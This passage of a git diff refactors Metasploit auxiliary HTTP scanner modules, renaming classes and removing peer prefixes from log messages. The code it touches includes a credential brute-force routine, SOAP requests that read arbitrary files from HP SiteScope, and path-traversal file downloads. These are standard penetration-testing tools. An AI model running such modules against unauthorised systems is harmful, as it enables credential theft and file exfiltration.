'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanUniqueQuery diff --git a/modules/auxiliary/scanner/http/etherpad_duo_login.rb b/modules/auxiliary/scanner/http/etherpad_duo_login.rb index 9da9bffde7..887ddc0ec2 100644 --- a/modules/auxiliary/scanner/http/etherpad_duo_login.rb +++ b/modules/auxiliary/scanner/http/etherpad_duo_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Msf::Auxiliary::AuthBrute @@ -32,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary return end - print_status("#{peer} - Starting login bruteforce...") + print_status("Starting login bruteforce...") each_user_pass do |user, pass| do_login(user, pass) end @@ -53,15 +53,15 @@ class Metasploit3 < Msf::Auxiliary } }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError - vprint_error("#{peer} - HTTP Connection Failed...") + vprint_error("HTTP Connection Failed...") return false end if (res and res.code == 200 and res.headers['Server'].include?("EtherPAD") and res.body.include?("EtherPAD Duo")) - vprint_good("#{peer} - Running EtherPAD Duo application ...") + vprint_good("Running EtherPAD Duo application ...") return true else - vprint_error("#{peer} - Application is not EtherPAD Duo. Module will not continue.") + vprint_error("Application is not EtherPAD Duo. Module will not continue.") return false end end @@ -98,7 +98,7 @@ class Metasploit3 < Msf::Auxiliary # def do_login(user, pass) - vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}") + vprint_status("Trying username:#{user.inspect} with password:#{pass.inspect}") begin res = send_request_cgi( @@ -108,16 +108,16 @@ class Metasploit3 < Msf::Auxiliary 'authorization' => basic_auth(user, pass) }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE - vprint_error("#{peer} - HTTP Connection Failed...") + vprint_error("HTTP Connection Failed...") return :abort end if res && res.code == 200 && res.body.include?("Home Page") && res.headers['Server'] && res.headers['Server'].include?("EtherPAD") - print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") + print_good("SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") report_cred(ip: rhost, port: rport, user: user, password: pass, proof: res.body) return :next_user else - vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}") + vprint_error("FAILED LOGIN - #{user.inspect}:#{pass.inspect}") end end end diff --git a/modules/auxiliary/scanner/http/f5_bigip_virtual_server.rb b/modules/auxiliary/scanner/http/f5_bigip_virtual_server.rb index dade96bb4f..9810b6acaa 100644 --- a/modules/auxiliary/scanner/http/f5_bigip_virtual_server.rb +++ b/modules/auxiliary/scanner/http/f5_bigip_virtual_server.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/f5_mgmt_scanner.rb b/modules/auxiliary/scanner/http/f5_mgmt_scanner.rb index 402c7dbdde..b6bcfb05eb 100644 --- a/modules/auxiliary/scanner/http/f5_mgmt_scanner.rb +++ b/modules/auxiliary/scanner/http/f5_mgmt_scanner.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Auxiliary 'DefaultOptions' => { 'SSL' => true, - 'SSLVersion' => 'TLS1', 'RPORT' => 443 } )) @@ -42,13 +41,13 @@ class Metasploit3 < Msf::Auxiliary res = send_request_raw({'method' => 'GET', 'uri' => '/'}, datastore['TIMEOUT']) return true if res rescue ::Rex::ConnectionRefused - vprint_status("#{peer} - Connection refused") + vprint_status("Connection refused") return false rescue ::Rex::ConnectionError - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return false rescue ::OpenSSL::SSL::SSLError - vprint_error("#{peer} - SSL/TLS connection error") + vprint_error("SSL/TLS connection error") return false end end @@ -61,19 +60,19 @@ class Metasploit3 < Msf::Auxiliary # Detect BigIP management interface if res.body =~ /BIG\-IP/ - print_good("#{peer} - F5 BigIP web management interface found") + print_good("F5 BigIP web management interface found") return end # Detect EM management interface if res.body =~ /<title>Enterprise Manager/ - print_good("#{peer} - F5 Enterprise Manager web management interface found") + print_good("F5 Enterprise Manager web management interface found") return end # Detect ARX management interface if res.body =~ /<title>F5 ARX Manager Login<\/title>/ - print_good("#{peer} - ARX web management interface found") + print_good("ARX web management interface found") return end end @@ -81,14 +80,14 @@ class Metasploit3 < Msf::Auxiliary # Detect BigIQ management interface res = send_request_raw('method' => 'GET', 'uri' => '/ui/login/') if res && res.code == 200 && res.body =~ /<title>BIG\-IQ/ - print_good("#{peer} - F5 BigIQ web management interface found") + print_good("F5 BigIQ web management interface found") return end # Detect FirePass management interface res = send_request_raw('method' => 'GET', 'uri' => '/admin/', 'rport' => rport) if res && res.code == 200 && res.body =~ /<br><br><br><big><b> FirePass/ - print_good("#{peer} - F5 FirePass web management interface found") + print_good("F5 FirePass web management interface found") return end end diff --git a/modules/auxiliary/scanner/http/file_same_name_dir.rb b/modules/auxiliary/scanner/http/file_same_name_dir.rb index b203939b13..bcc43e883d 100644 --- a/modules/auxiliary/scanner/http/file_same_name_dir.rb +++ b/modules/auxiliary/scanner/http/file_same_name_dir.rb @@ -7,7 +7,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanDir diff --git a/modules/auxiliary/scanner/http/files_dir.rb b/modules/auxiliary/scanner/http/files_dir.rb index ffd2f92819..75e4e8bf90 100644 --- a/modules/auxiliary/scanner/http/files_dir.rb +++ b/modules/auxiliary/scanner/http/files_dir.rb @@ -7,7 +7,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanDir diff --git a/modules/auxiliary/scanner/http/frontpage_login.rb b/modules/auxiliary/scanner/http/frontpage_login.rb index a690c8e661..cbaf9fe9d3 100644 --- a/modules/auxiliary/scanner/http/frontpage_login.rb +++ b/modules/auxiliary/scanner/http/frontpage_login.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/scanner/http/git_scanner.rb b/modules/auxiliary/scanner/http/git_scanner.rb index ee027272ff..4de859464c 100644 --- a/modules/auxiliary/scanner/http/git_scanner.rb +++ b/modules/auxiliary/scanner/http/git_scanner.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/gitlab_login.rb b/modules/auxiliary/scanner/http/gitlab_login.rb index 6217518937..7a5283878b 100644 --- a/modules/auxiliary/scanner/http/gitlab_login.rb +++ b/modules/auxiliary/scanner/http/gitlab_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/gitlab' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report @@ -47,9 +47,9 @@ class Metasploit3 < Msf::Auxiliary ) if res && res.body && res.body.include?('user[email]') - vprint_status("#{peer} - GitLab v5 login page") + vprint_status("GitLab v5 login page") elsif res && res.body && res.body.include?('user[login]') - vprint_status("#{peer} - GitLab v7 login page") + vprint_status("GitLab v7 login page") else vprint_error('Not a valid GitLab login page') return diff --git a/modules/auxiliary/scanner/http/gitlab_user_enum.rb b/modules/auxiliary/scanner/http/gitlab_user_enum.rb index e090a1e07c..da37582bf4 100644 --- a/modules/auxiliary/scanner/http/gitlab_user_enum.rb +++ b/modules/auxiliary/scanner/http/gitlab_user_enum.rb @@ -7,7 +7,7 @@ require 'rex/proto/http' require 'msf/core' require 'json' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/glassfish_login.rb b/modules/auxiliary/scanner/http/glassfish_login.rb index ee0000161b..44f0e8cd5d 100644 --- a/modules/auxiliary/scanner/http/glassfish_login.rb +++ b/modules/auxiliary/scanner/http/glassfish_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/login_scanner/glassfish' require 'metasploit/framework/credential_collection' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/http/goahead_traversal.rb b/modules/auxiliary/scanner/http/goahead_traversal.rb index 0dd40c9e34..2a51219b4c 100644 --- a/modules/auxiliary/scanner/http/goahead_traversal.rb +++ b/modules/auxiliary/scanner/http/goahead_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner @@ -69,9 +69,9 @@ class Metasploit3 < Msf::Auxiliary fname ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - print_error("#{peer} - Nothing was downloaded") + print_error("Nothing was downloaded") end end end diff --git a/modules/auxiliary/scanner/http/groupwise_agents_http_traversal.rb b/modules/auxiliary/scanner/http/groupwise_agents_http_traversal.rb index 2fde2d1901..a8db31c196 100644 --- a/modules/auxiliary/scanner/http/groupwise_agents_http_traversal.rb +++ b/modules/auxiliary/scanner/http/groupwise_agents_http_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/host_header_injection.rb b/modules/auxiliary/scanner/http/host_header_injection.rb index deea80733c..9de954628f 100644 --- a/modules/auxiliary/scanner/http/host_header_injection.rb +++ b/modules/auxiliary/scanner/http/host_header_injection.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanServer diff --git a/modules/auxiliary/scanner/http/hp_imc_bims_downloadservlet_traversal.rb b/modules/auxiliary/scanner/http/hp_imc_bims_downloadservlet_traversal.rb index 3339ef4e3b..0d450d626b 100644 --- a/modules/auxiliary/scanner/http/hp_imc_bims_downloadservlet_traversal.rb +++ b/modules/auxiliary/scanner/http/hp_imc_bims_downloadservlet_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/hp_imc_faultdownloadservlet_traversal.rb b/modules/auxiliary/scanner/http/hp_imc_faultdownloadservlet_traversal.rb index 1acddfa9d5..7521cecfb1 100644 --- a/modules/auxiliary/scanner/http/hp_imc_faultdownloadservlet_traversal.rb +++ b/modules/auxiliary/scanner/http/hp_imc_faultdownloadservlet_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb b/modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb index bb3859b313..e1051a09d8 100644 --- a/modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb +++ b/modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/hp_imc_reportimgservlt_traversal.rb b/modules/auxiliary/scanner/http/hp_imc_reportimgservlt_traversal.rb index 81f4519f49..2b3c981d67 100644 --- a/modules/auxiliary/scanner/http/hp_imc_reportimgservlt_traversal.rb +++ b/modules/auxiliary/scanner/http/hp_imc_reportimgservlt_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/hp_imc_som_file_download.rb b/modules/auxiliary/scanner/http/hp_imc_som_file_download.rb index ec3c90c5c6..25d6ca9f37 100644 --- a/modules/auxiliary/scanner/http/hp_imc_som_file_download.rb +++ b/modules/auxiliary/scanner/http/hp_imc_som_file_download.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report @@ -63,11 +63,11 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) unless is_imc_som? - vprint_error("#{peer} - HP iMC with the SOM component not found") + vprint_error("HP iMC with the SOM component not found") return end - vprint_status("#{peer} - Sending request...") + vprint_status("Sending request...") res = send_request_cgi({ 'uri' => normalize_uri("servicedesk", "servicedesk", "fileDownload"), 'method' => 'GET', @@ -89,9 +89,9 @@ class Metasploit3 < Msf::Auxiliary contents, fname ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - vprint_error("#{peer} - Failed to retrieve file") + vprint_error("Failed to retrieve file") return end end diff --git a/modules/auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess.rb b/modules/auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess.rb index fa4557f956..231654fd8d 100644 --- a/modules/auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess.rb +++ b/modules/auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report @@ -50,14 +50,14 @@ class Metasploit4 < Msf::Auxiliary @uri = normalize_uri(target_uri.path) @uri << '/' if @uri[-1,1] != '/' - print_status("#{peer} - Connecting to SiteScope SOAP Interface") + print_status("Connecting to SiteScope SOAP Interface") res = send_request_cgi({ 'uri' => "#{@uri}services/APISiteScopeImpl", 'method' => 'GET'}) if not res - print_error("#{peer} - Unable to connect") + print_error("Unable to connect") return end @@ -65,7 +65,7 @@ class Metasploit4 < Msf::Auxiliary end def accessfile - print_status("#{peer} - Retrieving the target hostname") + print_status("Retrieving the target hostname") data = "<?xml version='1.0' encoding='UTF-8'?>" + "\r\n" data << "<wsns0:Envelope" + "\r\n" @@ -107,11 +107,11 @@ class Metasploit4 < Msf::Auxiliary end if not host_name or host_name.empty? - print_error("#{peer} - Failed to retrieve the host name") + print_error("Failed to retrieve the host name") return end - print_status("#{peer} - Retrieving the file contents") + print_status("Retrieving the file contents") data = "<?xml version='1.0' encoding='UTF-8'?>" + "\r\n" data << "<wsns0:Envelope" + "\r\n" @@ -152,7 +152,7 @@ class Metasploit4 < Msf::Auxiliary boundary = $1 end if not boundary or boundary.empty? - print_error("#{peer} - Failed to retrieve the file contents") + print_error("Failed to retrieve the file contents") return end @@ -160,7 +160,7 @@ class Metasploit4 < Msf::Auxiliary cid = $1 end if not cid or cid.empty? - print_error("#{peer} - Failed to retrieve the file contents") + print_error("Failed to retrieve the file contents") return end @@ -168,17 +168,17 @@ class Metasploit4 < Msf::Auxiliary loot = Rex::Text.ungzip($1) end if not loot or loot.empty? - print_error("#{peer} - Failed to retrieve the file contents") + print_error("Failed to retrieve the file contents") return end f = ::File.basename(datastore['RFILE']) path = store_loot('hp.sitescope.file', 'application/octet-stream', rhost, loot, f, datastore['RFILE']) - print_status("#{peer} - #{datastore['RFILE']} saved in #{path}") + print_status("#{datastore['RFILE']} saved in #{path}") return end - print_error("#{peer} - Failed to retrieve the file contents") + print_error("Failed to retrieve the file contents") end end diff --git a/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb b/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb index e60872481f..10ec7754ba 100644 --- a/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb +++ b/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report @@ -51,7 +51,7 @@ class Metasploit4 < Msf::Auxiliary @uri = normalize_uri(target_uri.path) @uri << '/' if @uri[-1,1] != '/' - print_status("#{peer} - Connecting to SiteScope SOAP Interface") + print_status("Connecting to SiteScope SOAP Interface") uri = normalize_uri(@uri, 'services/APISiteScopeImpl') @@ -60,7 +60,7 @@ class Metasploit4 < Msf::Auxiliary 'method' => 'GET'}) if not res - print_error("#{peer} - Unable to connect") + print_error("Unable to connect") return end @@ -84,7 +84,7 @@ class Metasploit4 < Msf::Auxiliary data << "</wsns0:Body>" + "\r\n" data << "</wsns0:Envelope>" - print_status("#{peer} - Retrieving the SiteScope Configuration") + print_status("Retrieving the SiteScope Configuration") uri = normalize_uri(@uri, 'services/APISiteScopeImpl') @@ -103,7 +103,7 @@ class Metasploit4 < Msf::Auxiliary boundary = $1 end if not boundary or boundary.empty? - print_error("#{peer} - Failed to retrieve the SiteScope Configuration") + print_error("Failed to retrieve the SiteScope Configuration") return end @@ -111,7 +111,7 @@ class Metasploit4 < Msf::Auxiliary cid = $1 end if not cid or cid.empty? - print_error("#{peer} - Failed to retrieve the SiteScope Configuration") + print_error("Failed to retrieve the SiteScope Configuration") return end @@ -119,17 +119,17 @@ class Metasploit4 < Msf::Auxiliary loot = Rex::Text.ungzip($1) end if not loot or loot.empty? - print_error("#{peer} - Failed to retrieve the SiteScope Configuration") + print_error("Failed to retrieve the SiteScope Configuration") return end path = store_loot('hp.sitescope.configuration', 'application/octet-stream', rhost, loot, cid, "#{rhost} HP SiteScope Configuration") - print_status("#{peer} - HP SiteScope Configuration saved in #{path}") - print_status("#{peer} - HP SiteScope Configuration is saved as Java serialization data") + print_status("HP SiteScope Configuration saved in #{path}") + print_status("HP SiteScope Configuration is saved as Java serialization data") return end - print_error("#{peer} - Failed to retrieve the SiteScope Configuration") + print_error("Failed to retrieve the SiteScope Configuration") end end diff --git a/modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb b/modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb index db77012186..17b63d8bad 100644 --- a/modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb +++ b/modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report @@ -50,7 +50,7 @@ class Metasploit4 < Msf::Auxiliary @uri = normalize_uri(target_uri.path) @uri << '/' if @uri[-1,1] != '/' - print_status("#{peer} - Connecting to SiteScope SOAP Interface") + print_status("Connecting to SiteScope SOAP Interface") uri = normalize_uri(@uri, 'services/APIMonitorImpl') @@ -59,7 +59,7 @@ class Metasploit4 < Msf::Auxiliary 'method' => 'GET'}) if not res - print_error("#{peer} - Unable to connect") + print_error("Unable to connect") return end @@ -88,7 +88,7 @@ class Metasploit4 < Msf::Auxiliary data << "</wsns0:Body>" + "\r\n" data << "</wsns0:Envelope>" + "\r\n" - print_status("#{peer} - Retrieving the file contents") + print_status("Retrieving the file contents") uri = normalize_uri(@uri, 'services/APIMonitorImpl') @@ -104,16 +104,16 @@ class Metasploit4 < Msf::Auxiliary if res and res.code == 200 and res.body =~ /<loadFileContentReturn xsi:type="xsd:string">(.*)<\/loadFileContentReturn>/m loot = CGI.unescapeHTML($1) if not loot or loot.empty? - print_status("#{peer} - Retrieved empty file") + print_status("Retrieved empty file") return end f = ::File.basename(datastore['RFILE']) path = store_loot('hp.sitescope.file', 'application/octet-stream', rhost, loot, f, datastore['RFILE']) - print_status("#{peer} - #{datastore['RFILE']} saved in #{path}") + print_status("#{datastore['RFILE']} saved in #{path}") return end - print_error("#{peer} - Failed to retrieve the file") + print_error("Failed to retrieve the file") end end diff --git a/modules/auxiliary/scanner/http/hp_sys_mgmt_login.rb b/modules/auxiliary/scanner/http/hp_sys_mgmt_login.rb index 4862e49216..d681ead5f8 100644 --- a/modules/auxiliary/scanner/http/hp_sys_mgmt_login.rb +++ b/modules/auxiliary/scanner/http/hp_sys_mgmt_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/login_scanner/smh' require 'metasploit/framework/credential_collection' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient @@ -173,15 +173,15 @@ class Metasploit3 < Msf::Auxiliary version = get_version(res) unless version.blank? - print_status("#{peer} - Version detected: #{version}") + print_status("Version detected: #{version}") unless is_version_tested?(version) - print_warning("#{peer} - You're running the module against a version we have not tested") + print_warning("You're running the module against a version we have not tested") end end sys_name = get_system_name(res) unless sys_name.blank? - print_status("#{peer} - System name detected: #{sys_name}") + print_status("System name detected: #{sys_name}") report_note( :host => ip, :type => "system.name", @@ -190,7 +190,7 @@ class Metasploit3 < Msf::Auxiliary end if anonymous_access?(res) - print_good("#{peer} - No login necessary. Server allows anonymous access.") + print_good("No login necessary. Server allows anonymous access.") return end diff --git a/modules/auxiliary/scanner/http/http_header.rb b/modules/auxiliary/scanner/http/http_header.rb index 0fe42d2b52..d344d683a2 100644 --- a/modules/auxiliary/scanner/http/http_header.rb +++ b/modules/auxiliary/scanner/http/http_header.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/http_hsts.rb b/modules/auxiliary/scanner/http/http_hsts.rb index 06b6126bad..18a528107f 100644 --- a/modules/auxiliary/scanner/http/http_hsts.rb +++ b/modules/auxiliary/scanner/http/http_hsts.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/http_login.rb b/modules/auxiliary/scanner/http/http_login.rb index de43931a43..83b0db5bd1 100644 --- a/modules/auxiliary/scanner/http/http_login.rb +++ b/modules/auxiliary/scanner/http/http_login.rb @@ -10,7 +10,7 @@ require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/http' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/http_put.rb b/modules/auxiliary/scanner/http/http_put.rb index baf50cc32c..5bcc5160d5 100644 --- a/modules/auxiliary/scanner/http/http_put.rb +++ b/modules/auxiliary/scanner/http/http_put.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanDir diff --git a/modules/auxiliary/scanner/http/http_traversal.rb b/modules/auxiliary/scanner/http/http_traversal.rb index 94947a2f96..131f326dc9 100644 --- a/modules/auxiliary/scanner/http/http_traversal.rb +++ b/modules/auxiliary/scanner/http/http_traversal.rb @@ -10,7 +10,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report @@ -82,8 +82,8 @@ class Metasploit3 < Msf::Auxiliary # Avoids writing to datastore['METHOD'] directly - def method - @method || datastore['METHOD'] + def http_method + @http_method || datastore['METHOD'] end # Avoids writing to datastore['DATA'] directly @@ -136,7 +136,7 @@ class Metasploit3 < Msf::Auxiliary def ini_request(uri) req = {} - case method + case http_method when 'GET' # Example: Say we have the following datastore['PATH'] # '/test.php?page=1&id=3¬e=whatever' @@ -162,7 +162,7 @@ class Metasploit3 < Msf::Auxiliary this_path = uri end - req['method'] = method + req['method'] = http_method req['uri'] = this_path req['headers'] = {'Cookie'=>datastore['COOKIE']} if not datastore['COOKIE'].empty? req['data'] = data if not data.empty? @@ -225,7 +225,7 @@ class Metasploit3 < Msf::Auxiliary :proof => trigger, :name => self.fullname, :category => "web", - :method => method + :method => http_method }) else @@ -289,9 +289,9 @@ class Metasploit3 < Msf::Auxiliary # def is_writable(trigger) # Modify some registered options for the PUT method - tmp_method = method + tmp_method = http_method tmp_data = data - @method = 'PUT' + @http_method = 'PUT' if data.empty? unique_str = Rex::Text.rand_text_alpha(4) * 4 @@ -310,7 +310,7 @@ class Metasploit3 < Msf::Auxiliary send_request_cgi(req, 25) # Prepare request to read our file - @method = 'GET' + @http_method = 'GET' @data = tmp_data req = ini_request(uri) vprint_status("Verifying upload...") @@ -324,7 +324,7 @@ class Metasploit3 < Msf::Auxiliary end # Ah, don't forget to restore our method - @method = tmp_method + @http_method = tmp_method end # @@ -337,8 +337,8 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) # Warn if it's not a well-formed UPPERCASE method - if method !~ /^[A-Z]+$/ - print_warning("HTTP method #{method} is not Apache-compliant. Try only UPPERCASE letters.") + if http_method !~ /^[A-Z]+$/ + print_warning("HTTP method #{http_method} is not Apache-compliant. Try only UPPERCASE letters.") end print_status("Running action: #{action.name}...") diff --git a/modules/auxiliary/scanner/http/http_version.rb b/modules/auxiliary/scanner/http/http_version.rb index 10ac45f37a..2482947127 100644 --- a/modules/auxiliary/scanner/http/http_version.rb +++ b/modules/auxiliary/scanner/http/http_version.rb @@ -7,7 +7,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/httpbl_lookup.rb b/modules/auxiliary/scanner/http/httpbl_lookup.rb index 3fdc6c3755..248222bd78 100644 --- a/modules/auxiliary/scanner/http/httpbl_lookup.rb +++ b/modules/auxiliary/scanner/http/httpbl_lookup.rb @@ -6,7 +6,7 @@ require 'msf/core' require "net/dns/resolver" -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/iis_internal_ip.rb b/modules/auxiliary/scanner/http/iis_internal_ip.rb index ab597f3bc7..22258ad680 100644 --- a/modules/auxiliary/scanner/http/iis_internal_ip.rb +++ b/modules/auxiliary/scanner/http/iis_internal_ip.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/influxdb_enum.rb b/modules/auxiliary/scanner/http/influxdb_enum.rb index 4e13b6ad46..680b6a8146 100644 --- a/modules/auxiliary/scanner/http/influxdb_enum.rb +++ b/modules/auxiliary/scanner/http/influxdb_enum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report @@ -41,29 +41,29 @@ class Metasploit3 < Msf::Auxiliary 'method' => 'GET' ) rescue ::Errno::EPIPE, ::Timeout::Error, ::EOFError, ::IOError => e - print_error("#{peer} - The following Error was encountered: #{e.class}") + print_error("The following Error was encountered: #{e.class}") return end unless res - print_error("#{peer} - Server did not respond in an expected way.") + print_error("Server did not respond in an expected way.") return end if res.code == 401 && res.body =~ /Invalid username\/password/ - print_error("#{peer} - Failed to authenticate. Invalid username/password.") + print_error("Failed to authenticate. Invalid username/password.") return elsif res.code == 200 && res.headers.include?('X-Influxdb-Version') && res.body.length > 0 - print_status("#{peer} - Enumerating...") + print_status("Enumerating...") begin temp = JSON.parse(res.body) if temp.blank? - print_status("#{peer} - Json data is empty") + print_status("Json data is empty") return end results = JSON.pretty_generate(temp) rescue JSON::ParserError - print_error("#{peer} - Unable to parse JSON data.") + print_error("Unable to parse JSON data.") return end print_good("Found:\n\n#{results}\n") @@ -74,9 +74,9 @@ class Metasploit3 < Msf::Auxiliary results, 'InfluxDB Enum' ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - print_error("#{peer} - Unable to enum, received \"#{res.code}\"") + print_error("Unable to enum, received \"#{res.code}\"") end end end diff --git 